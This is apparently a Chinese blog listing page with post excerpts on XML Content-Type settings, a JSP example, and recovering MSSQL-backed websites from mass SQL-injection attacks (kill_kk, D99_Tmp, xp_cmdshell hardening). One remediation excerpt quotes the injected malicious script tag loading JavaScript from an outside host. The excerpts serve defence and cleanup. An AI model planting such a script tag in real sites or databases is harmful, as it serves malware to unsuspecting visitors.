2009年11月23日
摘要: 1,Content-Type很多时候无法解析就是Content-Type的问题。如果本身就是xml文件,请跳过这一步动态生成的XML一定要将其设置为text/xml,否则默认就是text/html也就是普通的文本了。常见语言的Content-Type设置header("Content-Type:text/xml"); //phpresponse.ContentType="text/xml" //a... 阅读全文
posted @ 2009-11-23 23:48 钱途无梁 阅读(783) 评论(0) 推荐(0) 编辑
摘要: 程序代码[代码]body:程序代码[代码]Accept.jsp:[代码]好了, 例子 就到这里, 应该能看懂把. 现在是返回xml. 不过听说json满流行的. 以后在做一些json传递的例子. 阅读全文
posted @ 2009-11-23 23:46 钱途无梁 阅读(2301) 评论(0) 推荐(0) 编辑
摘要: ------------------------------------------------------------网站被黑kill_kk/xiaolu/daxia123.cn挂马解决办法与原因客户站,出现生成不了,被挂马。谈不上解决,只找到原因现状:各CMS系统无法生成,但是其它操作正常。生成时一般提示“<' 附近有语法错”和“路径参数超过了最大允许... 阅读全文
posted @ 2009-11-23 14:28 钱途无梁 阅读(379) 评论(0) 推荐(0) 编辑
摘要: 防止非法表D99_Tmp,kill_kk的出现是防止我们的网站不被攻击,同时也是SQL安全防范一道必要的防线,虽说利用这种方式攻击的人都是黑客中的小鸟,但是我们也不得不防,以免造成不可想象的后果,废话不多说了,说下防范方法:xp_cmdshell可以让系统管理员以操作系统命令行解释器的方式执行给定的命令字符串,并以文本行方式返回任何输出,是一个功能非常强大的扩展存贮过程。一般的黑客攻击SQL Se... 阅读全文
posted @ 2009-11-23 14:19 钱途无梁 阅读(264) 评论(0) 推荐(0) 编辑
摘要: 昨日朋友一网站感染病毒,导致网站打不开、数据库显示混乱。杀毒软件报毒和网站瘫痪。后来发现是数据库多个表中都注入了<script src=http://cn.jxmmtv.com/cn.js></script>一段脚本。真是害人啊!通过分析该段脚本在数据库多个表,是Nchar类型喜欢注入。而且往往都是MSSQL数据库的网站。 于是本人只有用SQL命令逐个恢复数据库表。真是累死... 阅读全文
posted @ 2009-11-23 14:18 钱途无梁 阅读(634) 评论(0) 推荐(0) 编辑